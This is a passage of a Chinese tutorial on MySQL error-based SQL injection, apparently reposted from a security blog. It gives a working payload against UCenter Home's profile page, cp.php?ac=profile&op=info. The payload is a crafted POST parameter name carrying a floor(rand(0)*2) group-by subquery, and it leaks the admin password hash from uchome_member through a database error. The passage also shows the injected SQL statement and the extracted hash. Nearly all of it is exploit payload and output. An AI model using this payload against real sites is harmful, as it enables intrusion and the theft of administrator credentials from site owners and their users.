通过前面SQL错误信息获得了表前缀,那么直接就可以爆用户名为admin的hash
向cp.php?ac=profile&op=info POST提交参数: profilesubmit=1&formhash=232d1c54&info[a',(select 1 from(select count(*),concat((SELECT concat(password) FROM uchome_member where username like 'admin%'),floor(rand(0)*2))x from information_schema.tables group by x)a),'1')#]=1
SQL语句是: INSERT INTO uchome_spaceinfo (uid,type,subtype,title,friend) VALUES ('3','info','',(select 1 from(select count(*),concat((SELECT concat(password) FROM uchome_member where username like 'admin%'),floor(rand(0)*2))x from information_schema.tables group by x)a),'1')#','1','0')
得到 Admin 的 hash 是 6ad9ab1e6a74f51b57079c97329d208c ,最后一位是 group_key, 去掉最后一位 1 ,最后一位是 group_key.
from:RAyh4c的黑盒子
mysql暴错注入的科普 1 http://www.2cto.com/Article/201108/100722.html mysql暴错注入的科普 3 http://www.2cto.com/Article/201108/100724.html
查看更多关于mysql暴错注入的科普 2 - 网站安全 - 自学php的详细内容...